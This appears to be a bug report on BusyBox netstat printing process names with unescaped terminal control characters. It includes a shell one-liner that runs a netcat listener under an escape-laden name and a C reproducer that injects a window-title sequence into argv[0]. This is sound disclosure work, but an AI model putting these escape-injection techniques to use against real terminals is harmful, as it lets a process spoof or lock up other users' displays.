Open
Description
https://lists.busybox.net/pipermail/busybox/2025-November/091804.html
(ln -sf /usr/bin/nc /tmp/nc$(printf '\033[1mfoo\033[0m'); /tmp/nc* -l 31337 &); netstat -alp
http://web.archive.org/web/20241009201026/https://bugs.busybox.net/show_bug.cgi?id=15922
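The following code sets the title of an ANSI terminal to X when netstat prints the program name. The sequence reaches the terminal because the name is printed without escaping control characters. Without the final '\007' the terminal can be locked up.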
I think the project in general would benefit from an audit of every line using /proc/<pid>/cmdline, /proc/<pid>/comm, /proc/<pid>/environ and even the symlinks /proc/<pid>/exe & cwd.
$ cat > a.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <err.h>
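/*
 * Reproducer for the netstat report: a process that owns a UDP socket
 * rewrites its own argv[0] so that the name contains a terminal control
 * sequence (ESC ] 0 ; X BEL, i.e. "set window title to X").
 *
 * The point for reviewers: the program name shown next to a socket is
 * chosen by the process itself, so a tool that prints it must escape or
 * drop control bytes before writing to a terminal.
 * NOTE(review): presumably the name is read back through /proc/<pid>/cmdline;
 * confirm against the netstat source.
 *
 * Exits with status 1 on any setup failure; otherwise it never returns.
 */
int main(int argc, char *argv[]) {
    /* Test string, including the terminating BEL that closes the sequence. */
    static const char title_seq[] = "/\033]0;X\007";
    struct sockaddr_in sin;
    int s;

    /*
     * argv[0] is overwritten in place further down. The original used an
     * unchecked strcpy(), which writes past the end of argv[0] whenever the
     * program is started under a name shorter than the test string (or with
     * no argv[0] at all). Refuse to run in that case instead.
     */
    if (argc < 1 || argv[0] == NULL || strlen(argv[0]) < sizeof(title_seq) - 1)
        errx(1, "argv[0] is too short to hold the test string");

    if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
        err(1, "socket()");

    /* sin_port stays 0 after the memset, so bind() is given no fixed port. */
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = INADDR_ANY;
    if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0)
        err(1, "bind()");

    /* Length was checked above; sizeof includes the NUL terminator. */
    memcpy(argv[0], title_seq, sizeof(title_seq));

    /* Keep the socket open so the process stays listed by netstat -aup. */
    while (1)
        sleep(3600);
}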
EOF
$ unset PROMPT_COMMAND
$ cc a.c
$ ./a.out &
$ netstat -aup